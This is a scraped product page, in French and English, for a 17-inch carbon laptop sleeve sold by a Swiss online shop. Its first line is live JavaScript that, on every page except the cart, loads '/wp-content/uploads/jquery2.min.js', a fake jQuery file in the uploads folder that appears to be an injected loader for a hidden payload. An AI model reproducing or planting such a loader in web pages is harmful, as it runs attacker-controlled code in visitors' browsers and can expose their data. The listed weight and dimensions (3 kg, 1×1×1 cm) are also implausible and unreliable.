if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

Housse Carbone pour Ordinateur Portable 17 Pouces

Le Carbon Laptop Sleeve 17 ″ en carbone véritable est un régal pour les yeux ! La meilleure partie est que vous pouvez le personnaliser et y ajouter votre logo !

SKU SMTCLapTSleeb17 pouces Catégories , Marque:

$191.90

Poids 3.000 kg
Dimensions 1 × 1 × 1 cm
Matières

Noir mat, Regard noir

Housse Carbone pour Ordinateur Portable 17 Pouces

Le Carbon Laptop Sleeve 17 ″ en carbone véritable est un régal pour les yeux ! Tous ceux qui veulent se démarquer de la « foule grise » devraient jeter un œil à cette beauté.

Avec un faible poids et une belle apparence, tous les ordinateurs portables et ordinateurs portables jusqu'à 17 peuvent être rangés et protégés à l'intérieur.

La meilleure partie est que vous pouvez le personnaliser et y ajouter votre logo ! Cependant, si vous choisissez cette option, vous devez acheter un minimum de 10 sacs, et le prix par sac sera de 10 $ de plus que le prix initial.

Les ordinateurs portables deviennent maintenant un compagnon de voyage assez courant et une nécessité pour la vie quotidienne. Par conséquent, il est essentiel de prendre soin de cet appareil important. La housse pour ordinateur portable en carbone offre une opportunité incroyable d'offrir non seulement la commodité mais aussi la tranquillité d'esprit. Les pochettes protègent votre ordinateur portable de la poussière et d'autres éléments indésirables. Alors gardez votre ordinateur portable propre et augmentez sa longévité avec cette fantastique housse pour ordinateur portable suisse.

  • faible poids
  • Grande apparence
  • Votre propre logo

À propos

Swiss Mountain Handbags est un petit fabricant suisse. Ils offrent un caractère unique par leur conception et leurs matériaux. Qu'y a-t-il de si original dans les sacs à main Swiss Mountain ? Le fait qu'ils soient fabriqués à partir de camions d'occasion et de panneaux publicitaires en Suisse. Quelle belle idée ! Il est toujours préférable de commander des produits auprès d'un fabricant qui se soucie de la planète !

Obtenez Carbon Laptop Sleeve 17 pouces en ligne

Nous sommes la première et la plus ancienne boutique en ligne suisse authentique vendant uniquement des produits originaux fabriqués en Suisse. Comment obtenir celui-ci ? Commandez en ligne et vous recevez le colis suivi et assuré livré directement à votre porte, où que vous soyez dans le monde, directement depuis la Suisse.

  • Directement à votre porte
  • Où que vous soyez dans le monde
  • Directement de la Suisse
  • Disponible avec un forfait jusqu'à 2kg et plus.

Panier

×
Votre panier est vide. :( Go to Shop
Sélectionnez votre devise
Manches pour ordinateur portable en carboneHousse Carbone pour Ordinateur Portable 17 Pouces
$191.90
Remonter en haut
Rechercher

Flat shipping! Get more shipped in one order with our flat rate until 2 or 5 Kilogram shipping option!!

Carbon Laptop Sleeve 17 Inch

$191.90

The Carbon Laptop Sleeve 17 ″ made of real carbon is a feast for the eyes! The best part is you can personalize it and add your logo to it!

SKU: SMTCLapTSleeb17inch Categories: , Brand:

Description

Carbon Laptop Sleeve 17 Inch

The Carbon Laptop Sleeve 17 ″ made of real carbon is a feast for the eyes! Everyone who wants to stand out from the “gray crowd” should take a look at this beauty.

With a low weight and great appearance, all laptops and notebooks up to 17 ″ can be stowed away and protected inside of it.

The best part is you can personalize it and add your logo to it! However, if you choose this option, you have to buy a minimum of 10 bags, and the price per bag will be $10 more than the original price.

Laptops are now becoming quite a common travel companion and a necessity for daily life. Therefore, taking care of this important device is essential. The Carbon laptop sleeve gives an amazing opportunity to offer not only convenience but peace of mind too. The sleeves keep your laptop safe from dust and other unwanted elements. So keep your laptop clean and boost its longevity with this fantastic Swiss laptop sleeve.

  • Low weight
  • Great appearance
  • Your own logo

About the brand

Swiss Mountain Handbags is a small manufacturer from Switzerland. They provide uniqueness through their design and materials. What is so original about Swiss Mountain handbags? The fact that they are made from used trucks and advertising boards in Switzerland. What a lovely idea! It’s always best to order goods from a manufacturer who cares about the planet!

Get Carbon Laptop Sleeve 17 Inch online

We are the leading and oldest authentic Swiss online shop selling only original Swiss-made products. How to get this one? Order online, and you get the trackable, insured parcel delivered straight to your door, wherever you are in the world, directly from Switzerland.

  • Straight to your door
  • Wherever you are in the world
  • Directly from Switzerland
  • Available with a flat rate until 2kg and more.

Additional information

Weight 3.000 kg
Dimensions 1 × 1 × 1 cm
Material

Black matte, Black glance

GET IN TOUCH WITH US

News Updated

Select your currency
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]
[class^="wpforms-"]